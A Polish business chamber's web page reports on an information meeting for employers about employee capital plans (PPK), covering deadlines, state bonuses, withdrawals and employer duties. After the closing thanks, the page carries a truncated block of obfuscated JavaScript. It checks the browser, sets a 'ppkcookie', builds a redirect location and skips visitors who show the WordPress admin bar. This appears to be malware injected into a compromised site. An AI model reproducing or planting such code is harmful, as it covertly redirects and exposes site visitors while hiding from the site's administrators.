Relacja ze spotkania informacyjnego – PPK – na jakie obowiązki powinni przygotować się pracodawcy? | Północna Izba Gospodarcza w Koszalinie

 

W dniu 12 lutego w Restauracji Park Caffe w Koszalinie odbyło się spotkanie informacyjne dla przedsiębiorców dotyczące obowiązków na jakie muszą się przygotować w związku z wprowadzoną ustawą o Pracowniczych Planach Kapitałowych ( grupowego oszczędzania w ramach III filara systemu emerytalnego).

W czasie spotkania uczestnicy poznali zasady funkcjonowania PPK, od kiedy mają obowiązywać w poszczególnych przedsiębiorstwach oraz jakie są ostateczne terminy na zawarcie umowy o prowadzenie i zarządzanie PPK a także jakie są terminy odprowadzenia pierwszej wpłaty.

Druga część szkolenia była poświęcona informacją o korzyściach za założenie PPK (w tym 240 zł „na start” od Państwa).

Zaprezentowano również jak i kiedy będą wypłacane środki z PPK a także możliwości wcześniejszej wypłaty w związku z poważnym zachorowaniem lub zakupem mieszkania czy domu a także co się dzieje w sytuacji, gdy będziemy chcieli wycofać środki przed ukończeniem 60 roku życia.

W kolejnej części nasza ekspertka Pani Aneta Miller Dyrektor ds. Klientów Korporacyjnych PZU Życie opowiedziała o różnicach pomiędzy aktualnie dostępnym Pracowniczym Programem Emerytalnym (PPE) a PPK oraz dlaczego warto rozważyć wprowadzenie PPE w swoich firmach.

Przypominamy – Pracodawca prowadzący PPK ma obowiązek:

1.Terminowo i prawidłowo naliczać i przekazywać wpłaty do PPK  do instytucji finansowej.

2.Opiekować się dokumentacją PPK (zawarcie i archiwizowanie umów)

3.Pilnować terminu ponownego naliczania wpłat do PPK za danego uczestnika

4.Terminowo przekazywać uczestnikom, zarządzającemu oraz organom nadzorczym informacje związane z prowadzonym PPK

 

Jeżeli mają Państwo dodatkowe pytania, poniżej podajemy dane kontaktowe do naszych ekspertów.

Jeżeli chcieliby Państwo otrzymać prezentację ze szkolenia, prosimy o przesłanie informacji na adres dw@izba.info

Bardzo dziękujemy za udział w spotkaniu i zachęcamy do uczestnictwa w kolejnych szkoleniach organizowanych przez Północną Izbę Gospodarczą w Koszalinie. 'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m